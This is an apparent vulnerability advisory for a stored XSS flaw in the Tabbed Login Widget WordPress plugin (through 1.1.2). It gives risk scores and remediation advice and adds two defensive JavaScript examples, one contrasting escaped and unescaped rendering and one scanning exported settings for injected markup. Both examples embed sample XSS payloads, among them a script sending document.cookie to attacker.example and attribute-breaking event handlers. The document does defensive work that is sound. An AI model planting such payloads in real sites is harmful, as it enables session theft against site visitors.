Impact
Stored Cross-Site Scripting (XSS) vulnerabilities allow an attacker to inject a script that the application persists and later serves to every user who loads the affected page. In the Tabbed Login Widget plugin, attacker-supplied input is saved as received and later written into the page without sanitization or output escaping, so a script embedded in that input runs in the browser of anyone who views the widget. From there the attacker can capture the victim's session cookie, deface the site, or redirect users to malicious domains. The flaw is a classic instance of CWE-79: Improper Neutralization of Input During Web Page Generation.
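The save-then-render path described above, as an added example that is not the plugin's code or part of the advisory. It keeps a widget setting exactly as submitted, renders it once without escaping and once with escaping, and shows that escaping has to cover the attribute context as well as the element context. The field name `tab_title`, the option key, the rendered markup and the two payloads are all assumptions made for illustration.

```javascript
// Added example, not the plugin's code. Models the stored-XSS path the
// advisory describes: a widget setting is saved as received and later
// written into HTML without escaping. "tab_title", the option key and the
// markup below are illustrative assumptions.

// Minimal HTML escaper; for the characters that matter here it has the same
// effect as WordPress's esc_html() / esc_attr().
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Stand-in for the wp_options row a widget instance is stored in.
const optionsStore = {};

// Vulnerable save path: input is persisted exactly as submitted, with no
// sanitize_text_field() / wp_kses() on the way in.
function saveWidgetSettingsUnsafe(settings) {
  optionsStore.widget_tabbed_login = { ...settings };
  return optionsStore.widget_tabbed_login;
}

// Vulnerable render: the stored value lands in an attribute and in an
// element body with no escaping at all.
function renderUnsafe(settings) {
  return '<div class="tabbed-login">' +
    '<a href="#login" title="' + settings.tab_title + '">' +
    settings.tab_title + '</a></div>';
}

// Hardened render: escape on output, in every context the value is used in.
function renderSafe(settings) {
  const title = escapeHtml(settings.tab_title);
  return '<div class="tabbed-login">' +
    '<a href="#login" title="' + title + '">' +
    title + '</a></div>';
}

// Constructed payloads (not from the advisory). The first is the familiar
// element-context case; the second contains no '<' at all and works purely
// by closing the title attribute, which is why attribute context must be
// escaped too and why a "strip <script>" filter is not a fix.
const PAYLOAD_ELEMENT =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const PAYLOAD_ATTR = '" onmouseover="alert(document.domain)';

// True if the payload reaches the output byte-for-byte, i.e. as live markup.
function payloadIsLive(html, payload) {
  return html.includes(payload);
}

// Runs both payloads through both renderers and reports which survive.
function demo() {
  const results = {};
  const cases = [['element', PAYLOAD_ELEMENT], ['attribute', PAYLOAD_ATTR]];
  for (const [name, payload] of cases) {
    const stored = saveWidgetSettingsUnsafe({ tab_title: payload });
    results[name] = {
      unsafeLive: payloadIsLive(renderUnsafe(stored), payload),
      safeLive: payloadIsLive(renderSafe(stored), payload),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

In a real WordPress plugin the equivalent fix is to run the value through `sanitize_text_field()` in the widget's `update()` method and through `esc_attr()` or `esc_html()` at the point of output; validating on input alone is not sufficient because the same value may be used in more than one HTML context.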
Affected Systems
The affected product is the Tabbed Login Widget plugin for WordPress, developed by Vivek Marakana. Every WordPress installation running this plugin at version 1.1.2 or earlier is affected; the CNA description gives the affected range as all releases from the earliest through 1.1.2 inclusive.
Risk and Exploitability
A CVSS score of 6.5 corresponds to a Medium severity rating, and an EPSS score below 1% indicates that, at the time of assessment, the estimated near-term probability of exploitation in the wild was low; low, not zero. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, which means CISA had no confirmed evidence of active exploitation when this was written, not that none is occurring. To exploit it, an attacker submits a script payload through the plugin's input mechanisms; because the payload is stored, it is served to every subsequent visitor, so a single injection yields repeated execution rather than the one-off, victim-by-victim delivery of a reflected XSS. Remediation should not wait: update the plugin to a release that fixes the issue if one is available, or disable it in the meantime, and make sure the affected settings are escaped on output. Note that updating the code does not remove a payload that is already sitting in the database, so the stored widget settings should be inspected for injected markup as part of the response.
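A triage check for the "already injected" case, added here as an example and not part of the advisory or the plugin: it walks an exported widget-settings object and flags string values that look like injected markup. The export shape assumed is the JSON that `wp option get <option> --format=json` prints for a widget option; the option name, instance field names and sample values are constructed for illustration.

```javascript
// Added example, not part of the advisory or the plugin. Walks exported
// widget settings and flags values that look like injected markup. The
// field names and sample data are constructed; the export is assumed to be
// the JSON form of the widget's wp_options row.

// Patterns a stored-XSS payload almost always needs. Order matters: the
// first match decides the reported reason.
const SUSPICIOUS = [
  { reason: 'html tag', re: /<\s*\/?\s*[a-z][\w-]*/i },
  { reason: 'event handler attribute', re: /\bon[a-z]+\s*=/i },
  { reason: 'javascript: URL', re: /javascript\s*:/i },
  { reason: 'data:text/html URL', re: /data\s*:\s*text\/html/i },
];

// Recursively scans strings inside nested objects/arrays and returns
// {path, reason, value} for each hit. Non-string leaves are ignored.
function findSuspiciousValues(node, path = '') {
  const hits = [];
  if (typeof node === 'string') {
    for (const { reason, re } of SUSPICIOUS) {
      if (re.test(node)) {
        hits.push({ path, reason, value: node });
        break;
      }
    }
  } else if (node && typeof node === 'object') {
    for (const [key, child] of Object.entries(node)) {
      hits.push(...findSuspiciousValues(child, path ? `${path}.${key}` : key));
    }
  }
  return hits;
}

// Constructed sample export: four widget instances keyed by instance id plus
// WordPress's `_multiwidget` marker. Instance 1 is benign; 2, 3 and 4 carry
// injected content of three different kinds.
const SAMPLE_EXPORT = {
  '1': { tab_title: 'Login', register_title: 'Register' },
  '2': {
    tab_title: '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    register_title: 'Register',
  },
  '3': { tab_title: 'Login', register_title: '" onfocus="alert(1)" autofocus="' },
  '4': { tab_title: 'Login', link: 'javascript:alert(document.domain)' },
  '_multiwidget': 1,
};

// Entry point: returns the list of hits for an exported settings object.
function triage(exported) {
  return findSuspiciousValues(exported);
}

for (const hit of triage(SAMPLE_EXPORT)) {
  console.log(`${hit.path}: ${hit.reason}: ${JSON.stringify(hit.value)}`);
}
```

Treat hits as items for review rather than for automatic deletion: some widget settings legitimately contain limited HTML, and the patterns above are deliberately broad so that a payload cannot slip past by avoiding one of them. Instance 3 is the case worth remembering during review, since it contains no tag at all and would pass a check that only looks for `<script>`.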
OpenCVE Enrichment